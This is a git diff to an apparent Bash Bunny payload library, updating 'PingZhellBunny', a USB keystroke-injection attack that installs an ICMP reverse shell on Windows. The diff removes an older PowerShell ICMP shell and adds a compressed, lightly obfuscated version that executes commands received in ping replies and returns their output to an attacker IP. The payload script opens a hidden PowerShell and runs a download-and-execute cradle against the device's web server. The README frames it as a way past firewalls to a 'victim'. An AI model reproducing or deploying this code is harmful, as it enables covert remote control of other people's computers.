diff --git a/payloads/library/remote_access/PingZhellBunny/Bunny.pl b/payloads/library/remote_access/PingZhellBunny/Bunny.pl
index a00eb064..4bac2738 100644
--- a/payloads/library/remote_access/PingZhellBunny/Bunny.pl
+++ b/payloads/library/remote_access/PingZhellBunny/Bunny.pl
@@ -15,7 +15,7 @@
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
-# Modified by 0iphor13 for PingZhell
+# Modified by 0iphor13 for PingZhellBunny
#
#
#
@@ -29,7 +29,7 @@ use NetPacket::ICMP qw(ICMP_ECHOREPLY ICMP_ECHO);
use Net::RawIP;
use Fcntl;
-print "Bunny waitin' for connection...\n";
+print "Loading PingZhellBunny...\n";
# create raw socket
my $sock = IO::Socket::INET->new(
@@ -40,8 +40,16 @@ my $sock = IO::Socket::INET->new(
# set stdin to non-blocking
fcntl(STDIN, F_SETFL, O_NONBLOCK) or die "$!";
-print "Let's wait for PingZhell!\n";
+#Unnecessary print output - just for fun
+sleep(2);
+print ". .\n";
+sleep(1);
+print ". . .";
+sleep(1);
+print ". . . .";
+sleep(2);
+print "PingZhellBunny client ready!\n";
my $input = '';
while(1) {
if ($sock->recv(my $buffer, 4096, 0)) {
diff --git a/payloads/library/remote_access/PingZhellBunny/PingZhell.ps1 b/payloads/library/remote_access/PingZhellBunny/PingZhell.ps1
deleted file mode 100644
index 2687d299..00000000
--- a/payloads/library/remote_access/PingZhellBunny/PingZhell.ps1
+++ /dev/null
@@ -1,86 +0,0 @@
-
-<#
-
-Original script by nishang - modified by 0iphor13 for PingZhell
-
-Use bunny.pl as a master
-
-When running the master, don't forget to disable ICMP replies by the OS. For example:
-$: sysctl -w net.ipv4.icmp_echo_ignore_all=1
-Then:
-$: perl bunny.pl
-
-Microsoft please don't block, oh dear microsoft corporation
-#>
-
-
- $IPAddress = 'Attacker-IP'
- $Delay = 5
- $BufferSize = 128
-
- #Basic structure from http://stackoverflow.com/questions/20019053/sending-back-custom-icmp-echo-response
- $ICMPClientsWalkinDownTheStreet = New-Object System.Net.NetworkInformation.Ping
- $PingOptions = New-Object System.Net.NetworkInformation.PingOptions
- $PingOptions.DontFragment = $True
- $MicrosoftCopyright =@"
- _______ ___ __ _ _______ _______ __ __ _______ ___ ___
-| | | | | | | | | | | | | | |
-| _ | | |_| | ___|____ | |_| | ___| | | |
-| |_| | | | | __ ____| | | |___| | | |
-| ___| | _ | || | ______| | ___| |___| |___
-| | | | | | | |_| | |_____| _ | |___| | |
-|___| |___|_| |__|_______|_______|__| |__|_______|_______|_______|
-
-
-Windows PowerShell running as user $env:username on $env:computername `n
-"@;
-
- # Copyright Copies Right
- $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($MicrosoftCopyright)
- $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
-
- #Does a german penguin just PingUin?
- $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '> ')
- $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
-
- while ($true)
- {
- $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('')
- $reply = $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions)
-
- if ($reply.Buffer)
- {
- $response = ([text.encoding]::ASCII).GetString($reply.Buffer)
- $result = (Invoke-Expression -Command $response 2>&1 | Out-String )
- $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($result)
- $index = [math]::floor($NeverGonnaGiveYouUp.length/$BufferSize)
- $i = 0
-
- #Fragmant larger output into smaller ones to send to the server.
- if ($NeverGonnaGiveYouUp.length -gt $BufferSize)
- {
- while ($i -lt $index )
- {
- $NeverGonnaGiveYouUp2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..(($i+1)*$BufferSize-1)]
- $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp2, $PingOptions) | Out-Null
- $i +=1
- }
- $remainingindex = $NeverGonnaGiveYouUp.Length % $BufferSize
- if ($remainingindex -ne 0)
- {
- $NeverGonnaGiveYouUp2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..($NeverGonnaGiveYouUp.Length)]
- $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp2, $PingOptions) | Out-Null
- }
- }
- else
- {
- $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
- }
- $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes("`nPS " + (Get-Location).Path + '> ')
- $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
- }
- else
- {
- Start-Sleep -Seconds $Delay
- }
- }
diff --git a/payloads/library/remote_access/PingZhellBunny/PingZhellBunny.ps1 b/payloads/library/remote_access/PingZhellBunny/PingZhellBunny.ps1
new file mode 100644
index 00000000..5f9ddbac
--- /dev/null
+++ b/payloads/library/remote_access/PingZhellBunny/PingZhellBunny.ps1
@@ -0,0 +1,10 @@
+$Delay=5;
+$BufferSize=128;
+$ICMPBunny=New-Object System.Net.NetworkInformation.Ping;
+$PingBB=New-Object System.Net.NetworkInformation.PingOptions;
+$PingBB.DontFragment = $True;$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('Bunny@PS '+(gl).Path+'> ');
+$ICMPBunny.Send($IP,60 * 1000, $NeverGonnaGiveYouUp, $PingBB) | Out-Null;while ($true){$NeverGonnaGiveYouUp=([text.encoding]::ASCII).GetBytes('');
+$reply=$ICMPBunny.Send($IP,60 * 1000, $NeverGonnaGiveYouUp, $PingBB);if ($reply.Buffer){$response=([text.encoding]::ASCII).GetString($reply.Buffer);
+$result=(Invoke-eXprEssIon -Command $response 2>&1 | Out-String );$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($result);$index=[math]::floor($NeverGonnaGiveYouUp.length/$BufferSize);$i = 0;if($NeverGonnaGiveYouUp.length -gt $BufferSize){while ($i -lt $index ){$NGGYU2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..(($i+1)*$BufferSize-1)];$ICMPBunny.Send($IP,60 * 10000, $NGGYU2, $PingBB) | Out-Null;$i +=1;};
+$remainingindex=$NeverGonnaGiveYouUp.Length % $BufferSize;if($remainingindex -ne 0){$NGGYU2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..($NeverGonnaGiveYouUp.Length)];$ICMPBunny.Send($IP,60 * 10000, $NGGYU2, $PingBB) | Out-Null}}else{$ICMPBunny.Send($IP,60 * 10000, $NeverGonnaGiveYouUp, $PingBB) | Out-Null};$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes("`nO.MG@PS " + (pwd).Path + '> ');
+$ICMPBunny.Send($IP,60 * 1000, $NeverGonnaGiveYouUp, $PingBB) | Out-Null}else{Start-Sleep -Seconds $Delay}}
diff --git a/payloads/library/remote_access/PingZhellBunny/README.md b/payloads/library/remote_access/PingZhellBunny/README.md
index ac8ccd9f..6b190001 100644
--- a/payloads/library/remote_access/PingZhellBunny/README.md
+++ b/payloads/library/remote_access/PingZhellBunny/README.md
@@ -1,19 +1,19 @@
**Title: PingZhellBunny**
-Author: 0iphor13
+Author: 0iphor13
+OS: Windows
+Version: 1.5
-Version: 1.3
-
-What is PingZhellBunny?
+**What is PingZhellBunny?**
#
*Imagine a scenario in which communication to and from the server is protected and filtered by a firewall and does not allow TCP shell communication to take place on any listening port (both reverse and bind TCP connection).*
*But many environments allow ping requests to be sent and received. Ping requests work on the ICMP protocol.*
*ICMP stands for Internet Control Message Protocol; it is used by network devices’ query and error messages. ICMP differs from the widely used TCP and UDP protocols because ICMP is not used for transferring data between network devices.*
*When a device wants to test connectivity to another device, it uses the PING tool (ICMP communication) to send an ECHO REQUEST and waits for an ECHO RESPONSE.*
-*The client ICMP agent (Bunny.pl) listens for ICMP packets from a specific host and uses the data in the packet for command execution.*
-*The server ICMP Agent (Bunny.pl) sends ICMP packets to connect to the victim running a custom ICMP agent (PingZhell.ps1) and sends it commands to execute.*
+*The client ICMP agent listens for ICMP packets from a specific host and uses the data in the packet for command execution.*
+*The server ICMP agent (Bunny.pl) sends ICMP packets to connect to the victim running a custom ICMP agent (PingZhellBunny input) and sends it commands to execute.*
#
-There you go, a reverse shell.
+There you go, a reverse shell without the usage of ports.
**Instruction:**
@@ -26,16 +26,16 @@ Install dependencies, if needed:
Disable ICMP replies by the OS:
`sysctl -w net.ipv4.icmp_echo_ignore_all=1`
-Start Bunny.pl -> perl Bunny.pl
-#
-!!!Insert the IP of your attacking machine into PingZhell.ps1!!!
-#
-
Plug in Bashbunny with PingZhellBunny equipped.
+Start the client -> `perl Bunny.pl`
+
+
!!!Insert the IP of your attacking machine into the payload.txt variable $IP & Load PingZhellBunny.ps1 onto your Bunny!!!
+
+
Plug in your BashBunny.
Achieve reverse shell.
run away <3
Credit for code and ideas:
- bdamele
-- samratashok
+- Nikhil Mittal
- krabelize
diff --git a/payloads/library/remote_access/PingZhellBunny/payload.txt b/payloads/library/remote_access/PingZhellBunny/payload.txt
index 2b62fa78..2690061a 100644
--- a/payloads/library/remote_access/PingZhellBunny/payload.txt
+++ b/payloads/library/remote_access/PingZhellBunny/payload.txt
@@ -1,39 +1,44 @@
#!/bin/bash
#
# Title: PingZhellBunny
-# Description: Get remote access using a icmp reverse shell.
+# Description: Getting remote access via ICMP
# Author: 0iphor13
-# Version: 1.3
+# Version: 1.5
# Category: Remote_Access
-# Attackmodes: HID, Storage
+# Attackmodes: HID, RNDIS_ETHERNET
LED SETUP
-
-Q DELAY 500
+ATTACKMODE RNDIS_ETHERNET HID
GET SWITCH_POSITION
-DUCKY_LANG de
+GET HOST_IP
-Q DELAY 500
+cd /root/udisk/payloads/$SWITCH_POSITION/
-ATTACKMODE HID STORAGE
+# starting server
+LED SPECIAL
-#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
+# disallow outgoing dns requests so the server is accessible immediately
+iptables -A OUTPUT -p udp --dport 53 -j DROP
+python -m SimpleHTTPServer 80 &
-LED STAGE1
+# wait until port is listening
+while ! nc -z localhost 80; do sleep 0.2; done
-#After you have adapted the delays for your target, add "-W hidden"
+#Opens hidden powershell instance
Q DELAY 1500
-RUN WIN "powershell -Exec Bypass -NoP -NonI"
+Q GUI r
+Q DELAY 500
+Q STRING "powershell -NoP -NonI -w h"
Q DELAY 500
Q ENTER
-Q DELAY 1000
-Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\PingZhell.ps1')"
-Q DELAY 3000
+Q DELAY 500
+
+#Insert attacking IP
+Q STRING "\$IP = '0.0.0.0';"
+Q DELAY 250
+Q STRING "iex (New-Object Net.WebClient).DownloadString(\"http://$HOST_IP/PingZhellBunny.ps1\")"
+Q DELAY 400
Q ENTER
-Q DELAY 1000
-
-ATTACKMODE HID
-
LED FINISH